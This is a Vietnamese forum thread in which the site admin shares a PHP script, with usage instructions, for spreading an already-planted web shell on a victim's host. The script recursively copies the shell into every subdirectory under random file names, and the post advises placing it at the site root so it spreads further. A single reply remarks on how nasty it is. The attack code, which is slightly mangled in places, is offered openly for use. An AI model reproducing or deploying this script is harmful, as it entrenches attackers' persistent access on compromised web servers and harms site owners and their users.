Code phát tán shell trong Host victim

Discussion in 'Kiến thức lập trình' started by admin, Nov 5, 2011.

 1. admin

  admin Administrator Staff Member

  Joined:
  Oct 4, 2011
  Messages:
  22,247
  Likes Received:
  10,831
  Trophy Points:
  113
  Đặt con này cùng thư mục với con shell.
  Thay dòng dưới cho phù hợp:
  Code:
  $shell = "ten_con_shell.php";
  Sau đó gõ địa chỉ lên trình duyệt, nó sẽ copy vào tất cả thư mục con.
  Tốt nhất nên để ở thư mục gốc của site để phát tán nhiều hơn.
  Code:
  $shell = “ten_con_shell.php”;
  $host = $_SERVER['HTTP_HOST'];$root_dir = dirname(__FILE__);echo $root_dir.”“;lk(realpath(“./”));function lk($d){global $host;global $root_dir;global $shell;//echo “=====$d======“;if ($handle = opendir($d)){$dir_array = array();while ($file = readdir($handle)) {if($file!=”.”&&$file!=”..”){$realpath = $d.”/”.$file;if(is_dir($realpath))$dir_array[]=$realpath;}}}for($i=0;$i {$new_name = rand(0, 1000).”.php”;$tmp = $dir_array[$i];echo “http://”.str_replace($root_dir,$host,$tmp).”/”.$new_name.”“;copy($shell,$dir_array[$i].”\\”.$new_name);//echo $dir_array[$i].”“;}for($i=0;$i lk($dir_array[$i]);closedir($handle);} ?>
   
 2. congtust24

  congtust24 Vip

  Joined:
  May 19, 2012
  Messages:
  1,921
  Likes Received:
  325
  Trophy Points:
  0
  Occupation:
  hs
  Location:
  Sóc trăng
  Cái này ác gê nhỉ.
   

Share This Page